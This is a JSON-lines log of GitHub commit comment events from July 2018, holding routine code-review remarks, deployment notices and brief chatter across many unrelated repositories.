{"id":"7971751398","type":"CommitCommentEvent","actor":{"login":"dimitriconejo"},"repo":{"name":"dimitriconejo/pagina-web"},"payload":{"comment":{"id":29723098,"position":null,"line":null,"path":null,"commit_id":"40735d278e43b386890c64ce3e95850dc27875ab","created_at":"2018-07-16T16:25:58Z","updated_at":"2018-07-16T16:25:58Z","author_association":"OWNER","body":"Menos mal que está ya añadida..."}},"created_at":"2018-07-16T16:25:58Z"}
{"id":"7971752170","type":"CommitCommentEvent","actor":{"login":"dimitriconejo"},"repo":{"name":"dimitriconejo/pagina-web"},"payload":{"comment":{"id":29723100,"position":null,"line":null,"path":null,"commit_id":"40735d278e43b386890c64ce3e95850dc27875ab","created_at":"2018-07-16T16:26:07Z","updated_at":"2018-07-16T16:26:07Z","author_association":"OWNER","body":"# Perfecto amigo"}},"created_at":"2018-07-16T16:26:07Z"}
{"id":"7971752734","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29723103,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T16:26:13Z","updated_at":"2018-07-16T16:26:13Z","author_association":"NONE","body":"> So I cloned the repo, tried different combinations in testing and the most efficient options turned out to be the base images node:alpine` and `node-slim`.\r\n>\r\n> Tags allows the application to address „I just need to run this no matter the size“ and „I have limited resources and tag x suites my needs“ scenarios, both in one single Docker image.\r\n\r\nWhen would I need the bloated base image if the slim one works just as well? I've used `node:alpine` so far.\r\n\r\n> I myself host a small endpoint with about 10 instances of db-rest in the background for load balancing. Docker was the easiest way to do this setup.\r\n\r\nLet's talk more of this. In fact [very recently, we've had a problem with the upstream API blocking the server IP](https://github.com/derhuerst/vbb-rest/issues/29#issuecomment-404482924). Over the weekend, [I've built a WebSockets-based load balancing solution](https://github.com/derhuerst/vbb-rest/issues/29#issuecomment-405101473). I think your experience is very valuable here and we may benefit from your pool of nodes!\r\n\r\n> Docker was the easiest way to do this setup.\r\n\r\nWhat did you use to do the actual load balancing?"}},"created_at":"2018-07-16T16:26:13Z"}
{"id":"7971767524","type":"CommitCommentEvent","actor":{"login":"jaraws"},"repo":{"name":"jaraws/in28MinConfig"},"payload":{"comment":{"id":29723130,"position":null,"line":null,"path":null,"commit_id":"61f57f468f7d50f2cbd789706af9ffe352ae6935","created_at":"2018-07-16T16:29:06Z","updated_at":"2018-07-16T16:29:06Z","author_association":"OWNER","body":"accepting"}},"created_at":"2018-07-16T16:29:06Z"}
{"id":"7971784064","type":"CommitCommentEvent","actor":{"login":"anagornaia"},"repo":{"name":"anagornaia/neylor"},"payload":{"comment":{"id":29723325,"position":null,"line":null,"path":null,"commit_id":"21d31bea68041e740db518b2e7af0e04f10381a4","created_at":"2018-07-16T16:32:15Z","updated_at":"2018-07-16T16:32:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Simple learning system](https://trello.com/c/tKolEUVF/1-simple-learning-system)"}},"created_at":"2018-07-16T16:32:15Z"}
{"id":"7971784911","type":"CommitCommentEvent","actor":{"login":"Lingtaonju"},"repo":{"name":"alipay/sofa-mosn"},"payload":{"comment":{"id":29723339,"position":null,"line":null,"path":null,"commit_id":"29a1eafbc733811d50573be16b27273508d92b35","created_at":"2018-07-16T16:32:24Z","updated_at":"2018-07-16T16:32:24Z","author_association":"CONTRIBUTOR","body":"Pay attention: Chinese is forbidden for comment and commit message"}},"created_at":"2018-07-16T16:32:24Z"}
{"id":"7971794083","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29723499,"position":19,"line":55,"path":"src/main/java/org/spongepowered/common/event/tracking/phase/packet/InventoryPacketContext.java","commit_id":"f0b0e71ad2e42ba125eeeb9f895e8f6bbac39bf9","created_at":"2018-07-16T16:34:11Z","updated_at":"2018-07-16T16:34:11Z","author_association":"MEMBER","body":"Could use a switch here, would be must cleaner\r\n\r\n@gabizou I'm sure you'll want to clean it up."}},"created_at":"2018-07-16T16:34:11Z"}
{"id":"7971794843","type":"CommitCommentEvent","actor":{"login":"Dhatiwary"},"repo":{"name":"Pankaj0501/code-deploy"},"payload":{"comment":{"id":29723512,"position":null,"line":null,"path":null,"commit_id":"9167aaee4639cf7621c2f974a2cfada0328df404","created_at":"2018-07-16T16:34:18Z","updated_at":"2018-07-16T16:34:18Z","author_association":"COLLABORATOR","body":"Hi"}},"created_at":"2018-07-16T16:34:18Z"}
{"id":"7971795566","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"kovan-testnet/faucet"},"payload":{"comment":{"id":29723525,"position":null,"line":null,"path":null,"commit_id":"4bec36a31e5e3113f610ddf80609349ee5e1765c","created_at":"2018-07-16T16:34:27Z","updated_at":"2018-07-16T16:34:27Z","author_association":"NONE","body":"4bec36a"}},"created_at":"2018-07-16T16:34:27Z"}
{"id":"7971798032","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29723598,"position":null,"line":null,"path":null,"commit_id":"d460cde4cb43be6c6bef7601f90f6f15327bf0d4","created_at":"2018-07-16T16:34:55Z","updated_at":"2018-07-16T16:34:55Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T16:34:55Z"}
{"id":"7971799594","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"kovan-testnet/faucet"},"payload":{"comment":{"id":29723637,"position":null,"line":null,"path":null,"commit_id":"6fd0fc9b3ba797d6e4b92dfab7141e4fcdcbcdc1","created_at":"2018-07-16T16:35:13Z","updated_at":"2018-07-16T16:35:13Z","author_association":"NONE","body":"6fd0fc9"}},"created_at":"2018-07-16T16:35:13Z"}
{"id":"7971799701","type":"CommitCommentEvent","actor":{"login":"MicFin"},"repo":{"name":"elueder/yoga-api"},"payload":{"comment":{"id":29723640,"position":5,"line":44,"path":"app/controllers/poses_controller.rb","commit_id":"b11d17878b6a189013f4167d67b0ab1baec3cbce","created_at":"2018-07-16T16:35:14Z","updated_at":"2018-07-16T16:35:14Z","author_association":"NONE","body":"👍 😄 "}},"created_at":"2018-07-16T16:35:14Z"}
{"id":"7971801759","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"kovan-testnet/faucet"},"payload":{"comment":{"id":29723659,"position":null,"line":null,"path":null,"commit_id":"b1c09ca02527c2590d8d35b6ea9aeca95f503c0d","created_at":"2018-07-16T16:35:38Z","updated_at":"2018-07-16T16:35:38Z","author_association":"NONE","body":"b1c09ca"}},"created_at":"2018-07-16T16:35:38Z"}
{"id":"7971802686","type":"CommitCommentEvent","actor":{"login":"anilozmen"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29723660,"position":28,"line":28,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-16T16:35:49Z","updated_at":"2018-07-16T16:35:49Z","author_association":"OWNER","body":"Teşekkürler desteğiniz için."}},"created_at":"2018-07-16T16:35:49Z"}
{"id":"7971803679","type":"CommitCommentEvent","actor":{"login":"MicFin"},"repo":{"name":"gofar09/stocki-api"},"payload":{"comment":{"id":29723662,"position":5,"line":44,"path":"app/controllers/stocks_controller.rb","commit_id":"03c4e75301a956a9b11940d3af3736260f12c919","created_at":"2018-07-16T16:36:01Z","updated_at":"2018-07-16T16:36:01Z","author_association":"CONTRIBUTOR","body":"😄 👍 "}},"created_at":"2018-07-16T16:36:01Z"}
{"id":"7971804241","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/gemlib"},"payload":{"comment":{"id":29723665,"position":null,"line":null,"path":null,"commit_id":"433faa0c21e3f935195d01f0516f6f309fd359d2","created_at":"2018-07-16T16:36:09Z","updated_at":"2018-07-16T16:36:09Z","author_association":"MEMBER","body":"Is there a good reason to use double-colon rules? If so, a comment would have been welcome."}},"created_at":"2018-07-16T16:36:09Z"}
{"id":"7971805696","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"kovan-testnet/faucet"},"payload":{"comment":{"id":29723668,"position":null,"line":null,"path":null,"commit_id":"b2aa690f4a787c9bd3677660660d0c511e4f5d51","created_at":"2018-07-16T16:36:25Z","updated_at":"2018-07-16T16:36:25Z","author_association":"NONE","body":"b2aa690"}},"created_at":"2018-07-16T16:36:25Z"}
{"id":"7971805979","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29723669,"position":null,"line":null,"path":null,"commit_id":"6418de5f9cb079866fb041af4795e661db847676","created_at":"2018-07-16T16:36:27Z","updated_at":"2018-07-16T16:36:27Z","author_association":"MEMBER","body":"Oh I forgot to refactor this back a month when I cleaned code a bit."}},"created_at":"2018-07-16T16:36:27Z"}
{"id":"7971813596","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723679,"position":48,"line":38,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:37:54Z","updated_at":"2018-07-16T16:37:54Z","author_association":"OWNER","body":"Sure. Just a side note, i am trying following test case and it is passing while giving me assertion error as well, but if i send the approach and add `done`, it is failing as excted. Appreciate your help:\r\n`   it(\"[UT03] Send Remittance transaction of 50wei from alice to bob\", function (/*done*/) {\r\n        let instance;\r\n        var otp1 = web3.fromAscii(\"7745\");\r\n        var otp2 = web3.fromAscii(\"8291\");\r\n        var payID = web3.fromAscii(\"00001\");\r\n\r\n        remittanceCont.then(_instance => {\r\n            // Get alice and bob's balances\r\n            instance = _instance;            \r\n            return web3.eth.getBalancePromise(instance.address)\r\n        }).then(_contractBalance => {\r\n            contractBalance = _contractBalance;\r\n            return instance.hashHelper.call(bobAccount, otp1, otp2, payID);\r\n        }).then(puzzle => {\r\n            return instance.sendRemitance(puzzle, bobAccount, { from: aliceAccount, value: 400 })\r\n        }).then(txHash => {\r\n            return web3.eth.getBalancePromise(instance.address)\r\n        }).then(newContBalance => {            \r\n            assert(newContBalance.minus(contractBalance).toString(10) >= 500, \"[UT003] Invalid balance\");\r\n           /* done(); */           \r\n        })/*.catch(done)*/;`"}},"created_at":"2018-07-16T16:37:54Z"}
{"id":"7971814600","type":"CommitCommentEvent","actor":{"login":"seth-p"},"repo":{"name":"dcherian/xarray"},"payload":{"comment":{"id":29723683,"position":null,"line":null,"path":null,"commit_id":"5be3ff484e1d9cc849c998cabf0e94dbc4877c5a","created_at":"2018-07-16T16:38:07Z","updated_at":"2018-07-16T16:38:07Z","author_association":"NONE","body":"Curiously I just started working on https://github.com/pydata/xarray/pull/2285 at pretty much the same time. Major difference is that while you display the m-1 initial and 1 final value, I display m/2 initial and m/2 final values. (That, and I haven't implemented any tests yet...)"}},"created_at":"2018-07-16T16:38:07Z"}
{"id":"7971817434","type":"CommitCommentEvent","actor":{"login":"mattiapv"},"repo":{"name":"mattiapv/TurboBot"},"payload":{"comment":{"id":29723689,"position":null,"line":null,"path":null,"commit_id":"a5b79f5f7aa982800d482d03098e60ec78f1d736","created_at":"2018-07-16T16:38:42Z","updated_at":"2018-07-16T16:38:42Z","author_association":"OWNER","body":"Va lasciato nascosto 😮"}},"created_at":"2018-07-16T16:38:42Z"}
{"id":"7971822515","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723694,"position":79,"line":52,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:39:45Z","updated_at":"2018-07-16T16:39:45Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-16T16:39:45Z"}
{"id":"7971822700","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29723695,"position":86,"line":59,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T16:39:47Z","updated_at":"2018-07-16T16:39:47Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-16T16:39:47Z"}
{"id":"7971825596","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29723700,"position":null,"line":null,"path":null,"commit_id":"b53dfc8a076636491a4ec698ffc83f7b63df8cda","created_at":"2018-07-16T16:40:22Z","updated_at":"2018-07-16T16:40:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-47](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-47-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T16:40:22Z"}
{"id":"7971827702","type":"CommitCommentEvent","actor":{"login":"raghav5505"},"repo":{"name":"raghav5505/test"},"payload":{"comment":{"id":29723706,"position":8,"line":8,"path":".gitignore","commit_id":"7a7176eab772e8d69d29779045cd03c8ed593e2f","created_at":"2018-07-16T16:40:48Z","updated_at":"2018-07-16T16:40:48Z","author_association":"OWNER","body":"println \"hi\""}},"created_at":"2018-07-16T16:40:48Z"}
{"id":"7971829291","type":"CommitCommentEvent","actor":{"login":"raghav5505"},"repo":{"name":"raghav5505/test"},"payload":{"comment":{"id":29723710,"position":null,"line":null,"path":null,"commit_id":"7a7176eab772e8d69d29779045cd03c8ed593e2f","created_at":"2018-07-16T16:41:09Z","updated_at":"2018-07-16T16:41:09Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-16T16:41:09Z"}
{"id":"7971829667","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29723712,"position":null,"line":null,"path":null,"commit_id":"9c69eb6978bece34a354a246ec97a1ba84835daa","created_at":"2018-07-16T16:41:14Z","updated_at":"2018-07-16T16:41:14Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-34](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-34-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-16T16:41:14Z"}
{"id":"7971830217","type":"CommitCommentEvent","actor":{"login":"artvvb"},"repo":{"name":"Digilent/vivado-boards"},"payload":{"comment":{"id":29723713,"position":null,"line":null,"path":null,"commit_id":"2304e1db3dce324fe815482cbdfe33e34f5cb546","created_at":"2018-07-16T16:41:21Z","updated_at":"2018-07-16T16:41:21Z","author_association":"CONTRIBUTOR","body":"Well, and Arty Z7-10 and both Cora variants..."}},"created_at":"2018-07-16T16:41:21Z"}
{"id":"7971830291","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/gemlib"},"payload":{"comment":{"id":29723714,"position":7,"line":61,"path":"gemlib/Makefile","commit_id":"68407efda7ba55265574c795059d8b5a70b15694","created_at":"2018-07-16T16:41:22Z","updated_at":"2018-07-16T16:41:22Z","author_association":"MEMBER","body":"Beware, this whole file has CR+LF line endings, which can cause huge trouble sometimes. I don't know if there is a real issue here, but it would be a good idea to convert it to LF."}},"created_at":"2018-07-16T16:41:22Z"}
{"id":"7971837390","type":"CommitCommentEvent","actor":{"login":"mattludwig"},"repo":{"name":"ampproject/docs"},"payload":{"comment":{"id":29723721,"position":null,"line":null,"path":null,"commit_id":"8989d1e6f66f6b6671d8906713fd7857f51a3485","created_at":"2018-07-16T16:42:46Z","updated_at":"2018-07-16T16:42:46Z","author_association":"COLLABORATOR","body":"Doesn't look like this has made it's way into the most recent site build. Do you know why @pbakaus?"}},"created_at":"2018-07-16T16:42:46Z"}
{"id":"7971838109","type":"CommitCommentEvent","actor":{"login":"ryanneph"},"repo":{"name":"dohlin/spyfall"},"payload":{"comment":{"id":29723722,"position":null,"line":null,"path":null,"commit_id":"47c2351eb8e6c49adf03d34363f53aff2b4e7d43","created_at":"2018-07-16T16:42:55Z","updated_at":"2018-07-16T16:42:55Z","author_association":"NONE","body":"Technically this is not a removal of ads like the previous two commits, but a removal of the google analytics features instead."}},"created_at":"2018-07-16T16:42:55Z"}
{"id":"7971838728","type":"CommitCommentEvent","actor":{"login":"dcherian"},"repo":{"name":"dcherian/xarray"},"payload":{"comment":{"id":29723723,"position":null,"line":null,"path":null,"commit_id":"5be3ff484e1d9cc849c998cabf0e94dbc4877c5a","created_at":"2018-07-16T16:43:02Z","updated_at":"2018-07-16T16:43:02Z","author_association":"OWNER","body":"Haha ya. I was just trying to find the smallest solution; yours is quite good too. \r\nI only modified the existing tests; which you can do easily."}},"created_at":"2018-07-16T16:43:02Z"}
{"id":"7971838952","type":"CommitCommentEvent","actor":{"login":"petercpg"},"repo":{"name":"joelshepherd/tabliss"},"payload":{"comment":{"id":29723725,"position":5,"line":62,"path":"src/app/settings/System.tsx","commit_id":"3e8ee7451d56bbf526db605e686fd8f58a41e24b","created_at":"2018-07-16T16:43:06Z","updated_at":"2018-07-16T16:43:06Z","author_association":"CONTRIBUTOR","body":"@joelshepherd 中文（正體） refers to the script (Traditional Chinese/zh-Hant) only, without geograpical regions. So if you want to have it labeled as 中文（台灣）, 中文(简体) should be changed to something like 中文(中国) instead. \r\n\r\nAnd note that in the Taiwanese environment, parenthesis should be in full-width."}},"created_at":"2018-07-16T16:43:06Z"}
{"id":"7971843015","type":"CommitCommentEvent","actor":{"login":"ndambuki8"},"repo":{"name":"ndambuki8/Onedroid"},"payload":{"comment":{"id":29723732,"position":null,"line":null,"path":null,"commit_id":"269b23851f594f453426a60b4016c50f5e50fd03","created_at":"2018-07-16T16:43:52Z","updated_at":"2018-07-16T16:43:52Z","author_association":"OWNER","body":"wasee"}},"created_at":"2018-07-16T16:43:52Z"}
{"id":"7971846374","type":"CommitCommentEvent","actor":{"login":"dreua"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29723735,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-16T16:44:25Z","updated_at":"2018-07-16T16:44:25Z","author_association":"CONTRIBUTOR","body":"I just found this: https://stackoverflow.com/questions/43820677/why-so-many-duplicate-strings-in-exe-binary\r\nSo I think it's not a bug but unluckily there is no real answer as do why these duplicate data has to be there. "}},"created_at":"2018-07-16T16:44:25Z"}
{"id":"7971846540","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/gemlib"},"payload":{"comment":{"id":29723736,"position":null,"line":null,"path":null,"commit_id":"433faa0c21e3f935195d01f0516f6f309fd359d2","created_at":"2018-07-16T16:44:27Z","updated_at":"2018-07-16T16:44:27Z","author_association":"MEMBER","body":"I've been wondering about this magic spells as well. What they are good for?"}},"created_at":"2018-07-16T16:44:27Z"}
{"id":"7971848840","type":"CommitCommentEvent","actor":{"login":"ferzb"},"repo":{"name":"ferzb/ferzb.github.io"},"payload":{"comment":{"id":29723741,"position":null,"line":null,"path":null,"commit_id":"dcf9e80d3145ce0bc7fb2251f0a921fb491fca95","created_at":"2018-07-16T16:44:52Z","updated_at":"2018-07-16T16:44:52Z","author_association":"OWNER","body":"as"}},"created_at":"2018-07-16T16:44:52Z"}
{"id":"7971850006","type":"CommitCommentEvent","actor":{"login":"yahagi-day"},"repo":{"name":"ticper/new-ticper-cus"},"payload":{"comment":{"id":29723745,"position":null,"line":null,"path":null,"commit_id":"cfe400447e954d4188bd9e839a369aefb67179cf","created_at":"2018-07-16T16:45:08Z","updated_at":"2018-07-16T16:45:08Z","author_association":"MEMBER","body":"close #20 "}},"created_at":"2018-07-16T16:45:08Z"}
{"id":"7971850498","type":"CommitCommentEvent","actor":{"login":"ucLh"},"repo":{"name":"svnayden/RedOx"},"payload":{"comment":{"id":29723754,"position":55,"line":42,"path":"Parsing/parsing_lib.py","commit_id":"0f89b2398eac16c0d4c41819946cea127794b072","created_at":"2018-07-16T16:45:13Z","updated_at":"2018-07-16T16:45:13Z","author_association":"COLLABORATOR","body":"Исправил баг, с некорректным распознаванием электрона "}},"created_at":"2018-07-16T16:45:13Z"}
{"id":"7971854605","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723763,"position":4,"line":4,"path":"Lesson_1/quadratic_equation.rb","commit_id":"951b75d1df60f693cad7cef71241f9b7a4e53d7d","created_at":"2018-07-16T16:46:03Z","updated_at":"2018-07-16T16:46:03Z","author_association":"NONE","body":"коэффициэнты могут быть не целочисленными"}},"created_at":"2018-07-16T16:46:03Z"}
{"id":"7971855466","type":"CommitCommentEvent","actor":{"login":"untilted-document"},"repo":{"name":"dinastyoffreedom/dinastycoin"},"payload":{"comment":{"id":29723765,"position":null,"line":null,"path":null,"commit_id":"e5a1abe1739423849c3b83b868e851e6b51fda89","created_at":"2018-07-16T16:46:13Z","updated_at":"2018-07-16T16:46:13Z","author_association":"NONE","body":"Surely toDelete will always be 0?"}},"created_at":"2018-07-16T16:46:13Z"}
{"id":"7971855935","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723766,"position":17,"line":17,"path":"Lesson_1/quadratic_equation.rb","commit_id":"951b75d1df60f693cad7cef71241f9b7a4e53d7d","created_at":"2018-07-16T16:46:18Z","updated_at":"2018-07-16T16:46:18Z","author_association":"NONE","body":"можно посчитать квадратный корень один раз, присвоить его значение переменной и далее использовать эту переменную, вместо того чтобы считать каждый раз\r\n"}},"created_at":"2018-07-16T16:46:18Z"}
{"id":"7971856681","type":"CommitCommentEvent","actor":{"login":"Gnat008"},"repo":{"name":"Gnat008/perworldinventory-kt"},"payload":{"comment":{"id":29723767,"position":null,"line":null,"path":null,"commit_id":"8fe3d7dd88fd8e3758f71b3a3a78e6c8510d7476","created_at":"2018-07-16T16:46:28Z","updated_at":"2018-07-16T16:46:28Z","author_association":"OWNER","body":"@mibby It does indeed make the master branch 1.13 only. Build the pre-1.13 branch for builds that work on 1.12.2 and older."}},"created_at":"2018-07-16T16:46:28Z"}
{"id":"7971859745","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29723774,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-16T16:47:05Z","updated_at":"2018-07-16T16:47:05Z","author_association":"MEMBER","body":"It breaks backward compatibility. Probably, field name should be added as secondary error code. "}},"created_at":"2018-07-16T16:47:05Z"}
{"id":"7971860953","type":"CommitCommentEvent","actor":{"login":"MadhuPM"},"repo":{"name":"MadhuPM/x-ppt-master"},"payload":{"comment":{"id":29723775,"position":null,"line":null,"path":null,"commit_id":"eb2e63645a68704e0247c26acb3a077a9a2326a6","created_at":"2018-07-16T16:47:20Z","updated_at":"2018-07-16T16:47:20Z","author_association":"OWNER","body":"Readme.md"}},"created_at":"2018-07-16T16:47:20Z"}
{"id":"7971865818","type":"CommitCommentEvent","actor":{"login":"yfarjoun"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29723789,"position":4,"line":474,"path":"src/main/java/htsjdk/variant/vcf/AbstractVCFCodec.java","commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T16:48:18Z","updated_at":"2018-07-16T16:48:18Z","author_association":"NONE","body":"this could really explode in size, how about making it a Cache?"}},"created_at":"2018-07-16T16:48:18Z"}
{"id":"7971867172","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723791,"position":15,"line":15,"path":"Lesson_1/right_triangle.rb","commit_id":"912cae520596fd822a6a73a767eac1d8fc8e2e19","created_at":"2018-07-16T16:48:34Z","updated_at":"2018-07-16T16:48:34Z","author_association":"NONE","body":"длины сторон треугольника могут быть не целочисленными"}},"created_at":"2018-07-16T16:48:34Z"}
{"id":"7971867187","type":"CommitCommentEvent","actor":{"login":"Amitava90"},"repo":{"name":"Amitava90/Python-Project-Repo"},"payload":{"comment":{"id":29723793,"position":null,"line":null,"path":null,"commit_id":"1a96a352c1d58cd34dbfe0059734f888090e6ba8","created_at":"2018-07-16T16:48:35Z","updated_at":"2018-07-16T16:48:35Z","author_association":"OWNER","body":"This is a new text file for commit."}},"created_at":"2018-07-16T16:48:35Z"}
{"id":"7971867678","type":"CommitCommentEvent","actor":{"login":"CaptainGlac1er"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29723794,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-16T16:48:40Z","updated_at":"2018-07-16T16:48:40Z","author_association":"NONE","body":"using `exec(\"lsof -np \" . getmypid() . \" | wc -l\")` before `stream_select($selR, $selW, $selW, $this->Timelimit)` prints out that only 5 files are being in use by php before stream_select executes."}},"created_at":"2018-07-16T16:48:40Z"}
{"id":"7971868104","type":"CommitCommentEvent","actor":{"login":"drakmor"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29723797,"position":null,"line":null,"path":null,"commit_id":"19e8b686c5b5653a35c77d4d9be9359e1e3ef7b5","created_at":"2018-07-16T16:48:46Z","updated_at":"2018-07-16T16:48:46Z","author_association":"CONTRIBUTOR","body":"Any text input not working in console window."}},"created_at":"2018-07-16T16:48:46Z"}
{"id":"7971871225","type":"CommitCommentEvent","actor":{"login":"benjamin765"},"repo":{"name":"CarlosSj/wastemanagement"},"payload":{"comment":{"id":29723801,"position":null,"line":null,"path":null,"commit_id":"91c8847de06f8fbfa9ba4eb3f187e3a5501385de","created_at":"2018-07-16T16:49:26Z","updated_at":"2018-07-16T16:49:26Z","author_association":"COLLABORATOR","body":"sup\r\n"}},"created_at":"2018-07-16T16:49:26Z"}
{"id":"7971874665","type":"CommitCommentEvent","actor":{"login":"leegakyeong"},"repo":{"name":"leegakyeong/OP"},"payload":{"comment":{"id":29723805,"position":null,"line":null,"path":null,"commit_id":"df2d62b8a27843b50d3c80710d96d337dd54f1c0","created_at":"2018-07-16T16:50:08Z","updated_at":"2018-07-16T16:50:08Z","author_association":"OWNER","body":"지금은 프로젝트의 제목이나 책임자 이름 둘 중 하나라도 검색어를 포함하면 결과에 포함되록 만들어 놨는데 혹시 제목과 책임자 이름 중 하나에서만 찾아보도록 되돌려 놓고 싶다면\r\nhttps://github.com/leegakyeong/OP/commit/5ae8be13a9ab8c2a8f0df56629c69148df240cc2\r\n이 커밋을 확인할 것! "}},"created_at":"2018-07-16T16:50:08Z"}
{"id":"7971876774","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723808,"position":6,"line":6,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:50:31Z","updated_at":"2018-07-16T16:50:31Z","author_association":"NONE","body":"Can we call this array `counts` ?"}},"created_at":"2018-07-16T16:50:31Z"}
{"id":"7971876883","type":"CommitCommentEvent","actor":{"login":"nightm4re94"},"repo":{"name":"gurkenlabs/litiengine"},"payload":{"comment":{"id":29723809,"position":null,"line":null,"path":null,"commit_id":"fa1961e4ec2ce663b5889eae9495a58541dd0dec","created_at":"2018-07-16T16:50:31Z","updated_at":"2018-07-16T16:50:31Z","author_association":"COLLABORATOR","body":"![alt text](https://i.redd.it/71frrru59fex.png \"It wasn't me.\")"}},"created_at":"2018-07-16T16:50:31Z"}
{"id":"7971882903","type":"CommitCommentEvent","actor":{"login":"spullara"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29723815,"position":null,"line":null,"path":null,"commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T16:51:44Z","updated_at":"2018-07-16T16:51:44Z","author_association":"OWNER","body":"Makes sense. What is a typical cardinality for sizing the cache?"}},"created_at":"2018-07-16T16:51:44Z"}
{"id":"7971884254","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723819,"position":14,"line":14,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:51:58Z","updated_at":"2018-07-16T16:51:58Z","author_association":"NONE","body":"Division can actually be kindof expensive. We can implement radix sort using bit shifts instead of division. Then, you'd work a certain number of bits at a time (e.g. 8) and it can be more efficient.\r\n\r\nWhat you have here is great for understanding the algorithm though."}},"created_at":"2018-07-16T16:51:58Z"}
